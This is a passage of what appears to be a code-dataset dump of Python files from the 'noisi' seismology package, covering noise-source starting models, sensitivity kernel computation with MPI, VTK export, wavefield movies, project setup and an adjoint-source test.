get_ocean_mask()\n gdist *= ocean_mask\n\n return gdist\n\n elif disttype == 'homogeneous':\n return np.ones(ntraces)\n\n elif disttype == 'ocean':\n if not 'ocean_mask' in locals():\n ocean_mask = get_ocean_mask()\n return ocean_mask\n\n\ndef get_spectrum(sparams):\n spec = taper*np.exp(-(freq-sparams['central_freq'])**2/\n (2*sparams['sigma_freq']**2))\n return spec / np.max(np.abs(spec))\n\n\ndef get_specbasis(bandpass):\n\n low = bandpass[0]\n high = bandpass[1]\n corners = bandpass[2]\n\n low = low / (0.5*df)\n high = high / (0.5*df)\n\n z, p, k = iirfilter(corners, [low, high], btype='band',\n ftype='butter', output='zpk')\n w, h = freqz_zpk(z,p,k, worN=len(freq))\n \n # always zerophase\n h2 = h*np.conjugate(h)\n \n return np.real(h2)\n\n#########################\n# Create the source distr\n#########################\n\n\n#########################\n# geography\n#########################\nnum_bases = len(distributions)\ngauss_cnt = 0\nbasis_geo = np.zeros((num_bases,ntraces))\n\nprint('Filling distribution...')\n\nfor i in range(num_bases):\n\n if distributions[i] =='gaussian':\n\n gaussparams = params_gaussian_blobs[gauss_cnt]\n gauss_cnt += 1\n basis_geo[i,:] = get_geodist('gaussian',gaussparams)\n\n elif distributions[i] in ['ocean','homogeneous']:\n\n basis_geo[i,:] = get_geodist(distributions[i])\n \n \n else:\n print(distributions)\n raise NotImplementedError('Unknown geographical distributions. 
\\\n Must be \\'gaussian\\', \\'homogeneous\\' or \\'ocean\\'.')\n\ntry:\n print('Plotting...')\n from noisi.util import plot\n for i in range(num_bases):\n plot.plot_grid(grd[0],grd[1],basis_geo[i,:],normalize=False,\n outfile = os.path.join(sourcepath,'geog_distr_basis{}.png'.format(i)))\nexcept ImportError:\n print('Plotting not possible (is basemap installed?)')\n\n#########################\n# spectrum\n#########################\n\nif measr_config['bandpass'] is None:\n basis_spec = np.array(np.ones(len(freq)),ndmin=2)\n\nelse:\n num_sbases = len(measr_config['bandpass'])\n basis_spec = np.zeros((num_sbases,len(freq)))\n for i in range(num_sbases):\n basis_spec[i,:] = get_specbasis(measr_config['bandpass'][i])\n\n\nplt.figure()\nfor i in range(basis_spec.shape[0]):\n plt.semilogx(freq,basis_spec[i,:],'--')\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n\n\n########################\n# Initial geographic \n# weighting (unif)\n# This will not make sense anymore once\n# the weights matrix is adapted by updates\n########################\n\nweights = np.eye(basis_spec.shape[0],num_bases)\n\n\n########################\n# approximate surface\n# areas of all elements\n# set up in this way.\n########################\n\nif config[\"voronoi_surface_area\"]:\n from noisi.util.voronoi_surface_area import get_voronoi_surface_area\n grd, surf_areas = get_voronoi_surface_area(grd)\nelse:\n surf_areas = get_spherical_surface_elements(grd[0],grd[1])\n\n\n########################\n# Save to an hdf5 file\n########################\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('distr_basis',data=basis_geo.astype(np.float64))\n\n # for now: Geographic model can vary freely.\n fh.create_dataset('distr_weights',data=weights)\n fh.create_dataset('spect_basis',data=basis_spec.astype(np.float64))\n fh.create_dataset('surf_areas',data=surf_areas.astype(np.float64))\n\nbasis1_b = np.ones(basis_geo.shape)\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float32))\n fh.create_dataset('frequencies',data=freq.astype(np.float32))\n fh.create_dataset('distr_basis',data=basis1_b.astype(np.float32))\n fh.create_dataset('distr_weights',data=weights.astype(np.float32))\n fh.create_dataset('spect_basis',data=basis_spec.astype(np.float32))\n fh.create_dataset('surf_areas',data=surf_areas.astype(np.float64))\n\nprint('Done.')\n\n"
},
{
"alpha_fraction": 0.45604395866394043,
"alphanum_fraction": 0.4829059839248657,
"avg_line_length": 25.419355392456055,
"blob_id": "0e9b2dc69e6c14cd0b349a66f09035edf7dbfcba",
"content_id": "4973e08ade4715e515973f3986bf145e9a8b4612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1638,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 62,
"path": "/noisi/util/make_vtk_from_data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom meshpy.tet import build, Options, MeshInfo\nimport pyvtk\nfrom pyvtk import PointData, Scalars\nimport os\nimport sys\nimport h5py\n\ninfile = sys.argv[1]\ntry: \n sourcegrid = sys.argv[2]\nexcept:\n pass\noutfilename = os.path.splitext(infile)[0]\n\n#============================================================\n#- Read input.\n#============================================================\n\nprint('Read data ...')\ntry:\n m = np.load(infile)\n grd = np.load(sourcegrid)\nexcept:\n n = h5py.File(infile,'r')\n m = n['distr_basis'][:]\n grd = n['coordinates'][:]\n\nlat = grd[1]\nlon = grd[0]\n\n\n#============================================================\n#- Triangulation.\n#============================================================\n\nfor i in range(0,m.shape[0]):\n S = m[i,:]\n outfile = outfilename+'.'+str(i)+'.vtk'\n print('Compute Delauney triangulation ...')\n \n x=6371.0*np.cos(lat*np.pi/180.0)*np.cos(lon*np.pi/180.0)\n y=6371.0*np.cos(lat*np.pi/180.0)*np.sin(lon*np.pi/180.0)\n z=6371.0*np.sin(lat*np.pi/180.0)\n \n pts=np.array((x, y, z)).T\n mesh_info=MeshInfo()\n mesh_info.set_points(pts)\n opts=Options(\"Q\")\n mesh=build(mesh_info, options=opts)\n elements=mesh.elements\n \n #============================================================\n #- Write vtk file.\n #============================================================\n \n print('Write vtk file ...')\n \n vtkElements = pyvtk.VtkData(pyvtk.UnstructuredGrid(pts, tetra=elements), \n PointData(Scalars(S, 'grad_PSD_ZZ')), \"Mesh\")\n vtkElements.tofile(outfile)\n"
},
{
"alpha_fraction": 0.5720384120941162,
"alphanum_fraction": 0.5787975788116455,
"avg_line_length": 38.04166793823242,
"blob_id": "cd0f514abe1e5666b64bd6ee0af70eaf244c8ed9",
"content_id": "1c57082cd1a818aab4876c8aaefaa082174a92be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2811,
"license_type": "no_license",
"max_line_length": 217,
"num_lines": 72,
"path": "/noisi/my_classes/basisfunctions.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n# ToDo: Might not be necessary to have a separate class for this, but could be incorporated into the NoiseSource class.\n# ToDo: Docs\n\n# ToDo: This object is out of date. The idea was to have it in order to flexibly work with different bases, such as Gaussians, spherical harmonics, etc.\n# This may be still useful in the future so keep this fragment.\n\nclass MyBasis(object):\n \n def __init__(self,btype,params):\n \"\"\"\n possible types and parameters:\n 'boxcar' (like, linear frequency or period or time bins), params: nr. of bins\n 'gaussian' (Gaussians; params: mean and standard deviation as tuple)\n #ToDo: Maybe: Include default parameters\n \"\"\"\n\n\n \n # Is the type needed?\n self.btype = btype\n self.params = params\n \n\n #if isinstace(params,np.ndarray):\n # self.params = params\n #elif isinstance(params,str):\n # try:\n # self.params = np.load(params)\n # except:\n # raise IOError('Basis function file not found.')\n #else:\n # raise TypeError\n #\n\n def to_grid(self,grid):\n \"\"\"\n For basis functions defined in a simple manner -- e.g. 'Five frequency\n bins' return the basis functions on the specified grid. This depends on the type of basis function.\n :type grid: np.ndarray\n :param grid: The grid on which our simulation lives. This can be a time- or frequency axis, or a coordinate grid. ToDo: Think about how to handle meshgrids vs. coordinate lists (this is only a rearrangement).\n \"\"\"\n\n basis_grid = None\n\n if self.btype == 'boxcar': #This is mostly for understanding the principle.\n # Get the actual value of self.params! self.params is mutable. No modification wanted...\n basis_shape = [self.params[0]] #if self.params[0] > 1. else []\n basis_shape.extend(i for i in np.shape(grid))\n \n basis_grid = np.zeros(basis_shape)\n step = len(grid) // basis_shape[0]\n for i in np.arange(basis_shape[0]):\n basis_grid[i,i*step:(i+1)*step] = 1.\n\n \n\n #if self.btype == 'gaussian':\n # basis_shape = [len(self.params)] #if self.params not None else [1.]\n # basis_shape.extend(i for i in np.shape(grid))\n # basis_grid = np.zeros(basis_shape)\n # for i in np.arange(len(self.params)):\n # mu = self.params[i][0]\n # sig2 = self.params[i][1]**2\n # # ToDo: Use normalized Gaussians yes or no?\n # basis_grid[i,:] += np.exp(-1*(grid-mu)**2/(2*sig2))\n \n if np.shape(basis_grid)[0] > 1.:\n return basis_grid\n else:\n return basis_grid[0]\n"
},
{
"alpha_fraction": 0.4929151237010956,
"alphanum_fraction": 0.5073062777519226,
"avg_line_length": 31.030733108520508,
"blob_id": "1c2bf1939ba71983cf5aba4462fafea6b069c3ca",
"content_id": "7d380853b9498625d6da0683597e41c7eb7d0b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13550,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 423,
"path": "/noisi/scripts/run_kernel.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nfrom mpi4py import MPI\nimport numpy as np\nimport os\nimport h5py\nimport json\nimport click\nfrom glob import glob\nfrom math import ceil\nfrom scipy.signal.signaltools import fftconvolve\ntry:\n from scipy.fftpack import next_fast_len, hilbert\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom obspy import Trace, read, Stream\nfrom noisi import NoiseSource, WaveField\nfrom noisi.util import geo#, natural_keys\nfrom obspy.signal.invsim import cosine_taper\nfrom noisi.util import filter\ntry:\n from scipy.signal import sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\nfrom noisi.util.windows import my_centered, zero_buddy\nfrom noisi.util.geo import geograph_to_geocent\nfrom noisi.util.corr_pairs import *\nimport matplotlib.pyplot as plt\nimport instaseis\n\n\n\n#ToDo: put in the possibility to run on mixed channel pairs\ndef paths_input(cp,source_conf,step,ignore_network,instaseis):\n \n inf1 = cp[0].split()\n inf2 = cp[1].split()\n \n conf = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))\n measr_conf = json.load(open(os.path.join(source_conf['source_path'],\n 'measr_config.json')))\n channel = source_conf['channel']\n \n # station names\n if ignore_network:\n sta1 = \"*.{}..{}\".format(*(inf1[1:2]+[channel]))\n sta2 = \"*.{}..{}\".format(*(inf2[1:2]+[channel]))\n else:\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n\n\n # Wavefield files \n if instaseis == False:\n if source_conf['preprocess_do']:\n dir = os.path.join(source_conf['source_path'],'wavefield_processed')\n \n else:\n dir = conf['wavefield_path']\n \n wf1 = glob(os.path.join(dir,sta1+'.h5'))[0]\n wf2 = glob(os.path.join(dir,sta2+'.h5'))[0]\n else:\n # need to return two receiver coordinate pairs. 
\n # For buried sensors, depth could be used but no elevation is possible,\n # so maybe keep everything at 0 m?\n # lists of information directly from the stations.txt file.\n wf1 = inf1\n wf2 = inf2\n\n \n # Starting model for the noise source\n \n # The base model contains no spatial or spectral weights.\n nsrc = os.path.join(source_conf['project_path'],\n source_conf['source_name'],'step_'+str(step),\n 'base_model.h5')\n \n # Adjoint source\n if measr_conf['mtype'] in ['energy_diff','envelope']:\n adj_src_basicnames = [ os.path.join(source_conf['source_path'],\n 'step_'+str(step),\n 'adjt',\"{}--{}.c\".format(sta1,sta2)),\n os.path.join(source_conf['source_path'],\n 'step_'+str(step),\n 'adjt',\"{}--{}.a\".format(sta1,sta2))]\n else:\n adj_src_basicnames = [os.path.join(source_conf['source_path'],\n 'step_'+str(step),\n 'adjt',\"{}--{}\".format(sta1,sta2))]\n\n\n \n return(wf1,wf2,nsrc,adj_src_basicnames)\n \n \ndef paths_output(cp,source_conf,step):\n \n\n id1 = cp[0].split()[0]+cp[0].split()[1]\n id2 = cp[1].split()[0]+cp[1].split()[1]\n\n if id1 < id2 :\n inf1 = cp[0].split()\n inf2 = cp[1].split()\n else:\n inf2 = cp[0].split()\n inf1 = cp[1].split()\n\n channel = source_conf['channel']\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n \n\n kern_basicname = \"{}--{}\".format(sta1,sta2)\n kern_basicname = os.path.join(source_conf['source_path'],\n 'step_'+str(step), 'kern',\n kern_basicname)\n\n return (kern_basicname)\n \ndef get_ns(wf1,source_conf,insta):\n \n # Nr of time steps in traces\n if insta:\n # get path to instaseis db\n #ToDo: ugly.\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open \n db = instaseis.open_db(dbpath)\n # get a test seismogram to determine...\n stest = db.get_seismograms(source=instaseis.ForceSource(latitude=0.0,\n longitude=0.0),receiver=instaseis.Receiver(latitude=10.,\n longitude=0.0),dt=1./source_conf['sampling_rate'])[0]\n \n nt = stest.stats.npts\n Fs = stest.stats.sampling_rate\n else:\n with WaveField(wf1) as wf1:\n nt = int(wf1.stats['nt'])\n Fs = round(wf1.stats['Fs'],8)\n \n # Necessary length of zero padding for carrying out \n # frequency domain correlations/convolutions\n n = next_fast_len(2*nt-1) \n \n # Number of time steps for synthetic correlation\n n_lag = int(source_conf['max_lag'] * Fs)\n if nt - 2*n_lag <= 0:\n click.secho('Resetting maximum lag to %g seconds: Synthetics are too\\\n short for a maximum lag of %g seconds.' 
%(nt//2/Fs,n_lag/Fs))\n        n_lag = nt // 2\n    \n    n_corr = 2*n_lag + 1\n    \n    return nt,n,n_corr,Fs\n\n\ndef g1g2_kern(wf1str,wf2str,kernel,adjt,\n    src,source_conf,insta):\n    \n    measr_conf = json.load(open(os.path.join(source_conf['source_path'],\n        'measr_config.json')))\n\n\n    bandpass = measr_conf['bandpass']\n\n    if bandpass is None:\n        filtcnt = 1\n    elif type(bandpass) == list:\n        if type(bandpass[0]) != list:\n            filtcnt = 1\n        else:\n            filtcnt = len(bandpass) \n    \n    ntime, n, n_corr, Fs = get_ns(wf1str,source_conf,insta)\n    # use a one-sided taper: The seismogram probably has a non-zero end, \n    # being cut off wherever the solver stopped running.\n    taper = cosine_taper(ntime,p=0.01)\n    taper[0:ntime//2] = 1.0\n\n    \n########################################################################\n# Prepare filenames and adjoint sources\n######################################################################## \n\n    filenames = []\n    adjt_srcs = []\n    adjt_srcs_cnt = 0\n\n    for ix_f in range(filtcnt):\n        \n        filename = kernel+'.{}.npy'.format(ix_f)\n        filenames.append(filename)\n        #if os.path.exists(filename):\n        #    continue\n\n        f = Stream()\n        for a in adjt:\n            adjtfile = a + '*.{}.sac'.format(ix_f)\n            adjtfile = glob(adjtfile)\n            try: \n                f += read(adjtfile[0])[0]\n                f[-1].data = my_centered(f[-1].data,n_corr)\n                adjt_srcs_cnt += 1\n            except IndexError:\n                print('No adjoint source found: {}\\n'.format(a))\n                break\n\n        adjt_srcs.append(f)\n    \n    \n\n########################################################################\n# Compute the kernels\n######################################################################## \n\n\n    with NoiseSource(src) as nsrc:\n\n        \n        ntraces = nsrc.src_loc[0].shape[0]\n\n\n        if insta:\n            # open database\n            dbpath = json.load(open(os.path.join(source_conf['project_path'],\n                'config.json')))['wavefield_path']\n            # open and determine Fs, nt\n            db = instaseis.open_db(dbpath)\n            # get receiver locations; in instaseis mode, wf1str and wf2str\n            # are the station info lists returned by paths_input\n            lat1 = geograph_to_geocent(float(wf1str[2]))\n            lon1 = float(wf1str[3])\n            rec1 = instaseis.Receiver(latitude=lat1,longitude=lon1)\n            lat2 = geograph_to_geocent(float(wf2str[2]))\n            lon2 = float(wf2str[3])\n            rec2 = instaseis.Receiver(latitude=lat2,longitude=lon2)\n\n        else:\n            wf1 = WaveField(wf1str)\n            wf2 = WaveField(wf2str)\n\n        kern = np.zeros((filtcnt,ntraces,len(adjt)))\n\n        ########################################################################\n        # Loop over locations\n        ######################################################################## \n        for i in range(ntraces):\n\n            # noise source spectrum at this location\n            # For the kernel, this contains only the basis functions of the \n            # spectrum without weights; might still be location-dependent, \n            # for example when constraining sensitivity to ocean\n            S = nsrc.get_spect(i)\n            \n\n            if S.sum() == 0.: \n                # The spectrum has 0 phase so only checking absolute value here\n                continue\n\n            ####################################################################\n            # Get synthetics\n            #################################################################### \n            if insta:\n                # get source locations\n                lat_src = geograph_to_geocent(nsrc.src_loc[1,i])\n                lon_src = nsrc.src_loc[0,i]\n                fsrc = instaseis.ForceSource(latitude=lat_src,\n                    longitude=lon_src,f_r=1.e12)\n                \n                s1 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n                    receiver=rec1,\n                    dt=1./source_conf['sampling_rate'])[0].data*taper)\n                s2 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n                    receiver=rec2,\n                    dt=1./source_conf['sampling_rate'])[0].data*taper)\n                \n\n            else:\n                s1 = np.ascontiguousarray(wf1.data[i,:]*taper)\n                s2 = 
np.ascontiguousarray(wf2.data[i,:]*taper)\n \n \n\n spec1 = np.fft.rfft(s1,n)\n spec2 = np.fft.rfft(s2,n)\n \n \n g1g2_tr = np.multiply(np.conjugate(spec1),spec2)\n c = np.multiply(g1g2_tr,S)\n\n #######################################################################\n # Get Kernel at that location\n ####################################################################### \n corr_temp = my_centered(np.fft.ifftshift(np.fft.irfft(c,n)),n_corr)\n \n #######################################################################\n # Apply the 'adjoint source'\n #######################################################################\n for ix_f in range(filtcnt):\n f = adjt_srcs[ix_f]\n\n if f==None:\n continue\n for j in range(len(f)):\n delta = f[j].stats.delta\n \n kern[ix_f,i,j] = np.dot(corr_temp,f[j].data) * delta\n \n\n #elif measr_conf['mtype'] in ['envelope']:\n # if j == 0:\n # corr_temp_h = corr_temp\n # print(corr_temp_h)\n # if j == 1:\n # corr_temp_h = hilbert(corr_temp)\n # print(corr_temp_h)\n # \n # kern[ix_f,i,j] = np.dot(corr_temp,f[j].data) * delta\n \n \n \n if i%50000 == 0:\n print(\"Finished {} source locations.\".format(i))\n\n\n if not insta:\n wf1.file.close()\n wf2.file.close()\n\n for ix_f in range(filtcnt):\n filename = filenames[ix_f]\n if kern[ix_f,:,:].sum() != 0:\n np.save(filename,kern[ix_f,:,:]) \n return()\n\n \n\n\n\ndef run_kern(source_configfile,step,ignore_network=False):\n\n\n # simple embarrassingly parallel run:\n\n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm.Get_rank()\n\n step = int(step)\n\n\n #ToDo think about that configuration decorator\n source_config=json.load(open(source_configfile))\n measr_config = json.load(open(os.path.join(source_config['source_path'],\n 'measr_config.json')))\n\n obs_only = source_config['model_observed_only']\n #ToDo: ugly.\n insta = json.load(open(os.path.join(source_config['project_path'],\n 'config.json')))['instaseis']\n\n auto_corr = False # default value\n try:\n auto_corr = source_config['get_auto_corr']\n except KeyError:\n pass\n\n p = define_correlationpairs(source_config['project_path'],\n auto_corr = auto_corr)\n if rank == 0:\n print('Nr all possible kernels %g ' %len(p))\n \n # Remove pairs for which no observation is available\n if obs_only:\n directory = os.path.join(source_config['source_path'],\n 'observed_correlations')\n p = rem_no_obs(p,source_config,directory=directory)\n if rank == 0:\n print('Nr kernels after checking available observ. %g ' %len(p))\n \n\n\n # The assignment of station pairs should be such that one core \n # has as many occurrences of the same station as possible; \n # this will prevent that many processes try to access the \n # same hdf5 file all at once.\n num_pairs = int( ceil(float(len(p))/float(size)) )\n p_p = p[ rank*num_pairs : rank*num_pairs + num_pairs] \n \n print('Rank number %g' %rank)\n print('working on pair nr. %g to %g of %g.' %(rank*num_pairs,\n rank*num_pairs+num_pairs,len(p)))\n\n\n \n for cp in p_p:\n \n try:\n wf1,wf2,src,adjt = paths_input(cp,source_config,\n step,ignore_network,insta)\n print(wf1,wf2,src)\n kernel = paths_output(cp,source_config,step)\n print(kernel)\n \n except:\n print('Could not find input for: %s\\\n\\nCheck if wavefield .h5 file and base_model file are available.' %cp)\n continue\n\n\n kern = g1g2_kern(wf1,wf2,kernel,adjt,src,source_config,insta=insta)\n \n return()\n\n"
},
{
"alpha_fraction": 0.6161380410194397,
"alphanum_fraction": 0.6506530046463013,
"avg_line_length": 29.72058868408203,
"blob_id": "fc248ac7eaeb8e1d4fc4df96d000b39618f1ee52",
"content_id": "a540750e2a5cab5c4c271d22206f4d2d92985afc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2144,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 68,
"path": "/noisi/util/wavefield_movie.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# This example uses a MovieWriter directly to grab individual frames and\n# write them to a file. This avoids any event loop integration, but has\n# the advantage of working with even the Agg backend. This is not recommended\n# for use in an interactive setting.\n# -*- noplot -*-\n\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as manimation\nfrom noisi import WaveField\nimport sys\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.mlab import griddata\nimport matplotlib.tri as tri \n\n\n#################################\nv = 1.\nstations = [(0.,0.)]\nlonmin=-120.\nlonmax=120.\nlatmin=-60.\nlatmax=60.\nlatc=0.0\nlonc=0.0\nresolution = 4\nfps = 0.5\n\nwf = WaveField(sys.argv[1])\nt_min = float(sys.argv[2])\nt_max = float(sys.argv[3])\nt_step = float(sys.argv[4])\nfilename = sys.argv[5]\n#################################\n\nFFMpegWriter = manimation.writers['ffmpeg']\nmetadata = dict(title='Wavefield', artist='Matplotlib',\n comment='Movie support!')\nwriter = FFMpegWriter(fps=fps, metadata=metadata)\n\nfig = plt.figure()\nplt.subplot(111)\n\nmap_x = wf.sourcegrid[0]\nmap_x = map_x[0::resolution]\nmap_y = wf.sourcegrid[1]\nmap_y = map_y[0::resolution]\ntriangles = tri.Triangulation(map_x,map_y)\nm = Basemap(rsphere=6378137,resolution='c',projection='cyl',lat_0=latc, lon_0=lonc,llcrnrlat=latmin,urcrnrlat=latmax,\n llcrnrlon=lonmin,urcrnrlon=lonmax)\n \nm.drawcoastlines(linewidth=0.5)\nm.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels\nm.drawmeridians(np.arange(-180,210,60.),labels=[0,0,0,1]) # draw meridians\nfor sta in stations:\n m.plot(sta[0],sta[1],'rv',markersize=10,latlon=True)\n\n\nwith writer.saving(fig, filename, 100):\n for t in np.arange(t_min,t_max,t_step):\n print(t)\n map_z = wf.get_snapshot(t,resolution=resolution)\n #if globe:\n # map_z = np.append(map_z,map_z[0])\n plt.tripcolor(triangles, map_z/np.max(np.abs(map_z)), shading='flat', vmin=-v,vmax=v, cmap=plt.cm.bwr)\n writer.grab_frame()\n \n\n \n \n \n \n"
},
{
"alpha_fraction": 0.6184738874435425,
"alphanum_fraction": 0.6198126077651978,
"avg_line_length": 28.8799991607666,
"blob_id": "6e391280ef6f0392579eca32168a3e539e07b22a",
"content_id": "b5f9808342d3ccf3014e98637fe4cb2dbe4c5dd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 25,
"path": "/noisi/util/setup_new.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport io\nimport time\nimport json\nfrom noisi import _ROOT\n\ndef setup_proj(project_name):\n\n os.makedirs(os.path.join(project_name))\n \n with io.open(os.path.join(_ROOT,'config','config.json'),'r+') as fh:\n conf = json.loads(fh.read())\n \n conf['date_created'] = time.strftime(\"%Y.%m.%d\")\n conf['project_name'] = project_name\n conf['project_path'] = os.path.abspath(project_name)\n\n \n with io.open(os.path.join(project_name,'config.json'),'w') as fh:\n cf = json.dumps(conf,sort_keys=False, indent=4, separators=(\",\", \": \"))\n fh.write(cf)\n \n # Copy gaussian grid notebook\n os.system('cp {} {}'.format(os.path.join(_ROOT,'jnotebks/setup_gaussian_grid.ipynb'),\n project_name))\n"
},
{
"alpha_fraction": 0.5815004706382751,
"alphanum_fraction": 0.6071105599403381,
"avg_line_length": 27.84347915649414,
"blob_id": "caeb0296d7368ff3533b2640a49e822440c5cfed",
"content_id": "a0717a26bef4ac47755b3bf662f9cfc61e7a3065",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3319,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 115,
"path": "/noisi/test/check_adjstf.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom obspy import Trace\nfrom noisi.scripts import measurements as rm\nfrom noisi.scripts import adjnt_functs as af\nfrom scipy.signal import hilbert\n\n# more or less copying Korbi's test with my measurement and adjoint source \n\n\n# *********************************************\n# input:\n# *********************************************\n#scale = 1e20 #ununsed\nsteps = np.arange(-14, 0, 0.1)\nmtype = 'square_envelope'#'ln_energy_ratio'\nsacdict = {'dist':1e6}\ng_speed = 3700.\nwindow_params = {}\nwindow_params['hw'] = 200\nwindow_params['sep_noise'] = 1.\nwindow_params['win_overlap'] = False\nwindow_params['wtype'] = 'hann'\nwindow_params['causal_side'] = False\nwindow_params['plot'] = False\n# *********************************************\n# *********************************************\n\n# only for testing the test:\n# def l2_simple(tr_1,tr_2):\n# \tmf = np.sum(0.5 * (tr_1.data - tr_2.data) **2)\n# \tadstf = (tr_1.data - tr_2.data)\n# \treturn mf,adstf\n\nm_a_options = {'g_speed':g_speed,'window_params':window_params}\nm_func = rm.get_measure_func(mtype)\na_func = af.get_adj_func(mtype)\n\n\n# create observed data, synthetics and perturbation\nc_obs = 2 * (np.random.rand(2401,) - 0.5)\nc_ini = 2 * (np.random.rand(2401,) - 0.5)\nd_c = 2 * (np.random.rand(2401,) - 0.5)\n# form traces (measurement script works with obspy trace objects, not pure arrays)\nc_obs = Trace(data=c_obs)\nc_obs.stats.sampling_rate = 1.0\nc_obs.stats.sac = sacdict\n\nc_syn = Trace(data=c_ini)\nc_syn.stats.sampling_rate = 1.0\nc_syn.stats.sac = sacdict\n\n#tr_taper_filter = Trace(data=np.ones(c_obs.stats.npts))\n\n# obtain a measurement and an adjoint source time function\n# for the unperturbed measurement\nmsr_o = m_func(c_obs,**m_a_options)\nmsr_s = m_func(c_syn,**m_a_options)\ndata, success = a_func(c_obs,c_syn,**m_a_options)\n\n\nif mtype == 'energy_diff':\n\tdata = data[0] + data[1]\n\tmsr_s = msr_s[0] + msr_s[1]\n\tmsr_o = msr_o[0] + msr_o [1]\n\tdata *= (msr_s-msr_o)\n\nelif mtype == 'ln_energy_ratio':\n\tdata *= (msr_s-msr_o)\n\nelif mtype == 'windowed_waveform':\n\tpass\n#elif mtype == 'envelope':\n#\tdata = data[0] + data[1]\n\nif mtype in ['ln_energy_ratio','energy_diff']:\n\tj = 0.5*(msr_s-msr_o)**2\nelif mtype in ['windowed_waveform','square_envelope','envelope']:\n\tj = 0.5 * np.sum(np.power((msr_s-msr_o),2))\n\n# testing the test:\n# j,data = l2_simple(c_syn,c_obs)\n\n# left hand side of test 1: adjt source time function * du = change of misfit wrt u\ndjdc = np.dot(data,d_c) \n\n#if mtype in ['envelope','square_envelope']:\n#\tdjdc = np.dot(data[0],d_c)\n\t#djdc += np.dot(data[1],d_c)\n\n# right hand side of test 1: Finite difference approx of misfit change for different steps\n\n\ndcheck = []\nd_ch = c_syn.copy()\n\n\nfor step in steps:\n\td_ch.data = c_ini + 10. ** step * d_c\n\tmsr_sh = m_func(d_ch,**m_a_options)\n\tif mtype == 'energy_diff':\t\n\t\tmsr_sh = msr_sh[0] + msr_sh[1]\n\n\tjh = 0.5 * (msr_sh - msr_o)**2\n\tif mtype in ['windowed_waveform','envelope','square_envelope']:\n\t\tjh = 0.5 * np.sum(np.power((msr_sh-msr_o),2))\n\t# testing the test:\n\t# jh, dn = l2_simple(d_ch,c_obs)\n\tdjdch = (jh - j) / (10.**step) \n\tdcheck.append(abs(djdc - djdch) / abs(djdc))\n\t\n# plot\nplt.semilogy(steps,dcheck)\nplt.title(\"Check for adjoint source time function\")\nplt.show()\n\n\n"
},
{
"alpha_fraction": 0.5622403025627136,
"alphanum_fraction": 0.5796077847480774,
"avg_line_length": 33.2849006652832,
"blob_id": "3c8d89171cc0cc2fa878efa21ca9b2aad7d7868e",
"content_id": "23ce0435bfe171dbbc46ca65b1c3e7e6f16a076a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12034,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 351,
"path": "/noisi/scripts/run_correlation.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nfrom mpi4py import MPI\nimport numpy as np\nimport os\nimport h5py\nimport json\nimport click\nfrom glob import glob\nfrom math import ceil\nfrom scipy.signal.signaltools import fftconvolve\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\n \nfrom obspy import Trace, read, Stream\nfrom noisi import NoiseSource, WaveField\nfrom noisi.util import geo#, natural_keys\nfrom obspy.signal.invsim import cosine_taper\nfrom noisi.util import filter\ntry:\n from scipy.signal import sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\nfrom noisi.util.windows import my_centered, zero_buddy\nfrom noisi.util.geo import geograph_to_geocent\nfrom noisi.util.corr_pairs import define_correlationpairs,rem_fin_prs,rem_no_obs\nimport matplotlib.pyplot as plt\nimport instaseis\n\n\n#ToDo: put in the possibility to run on mixed channel pairs\ndef 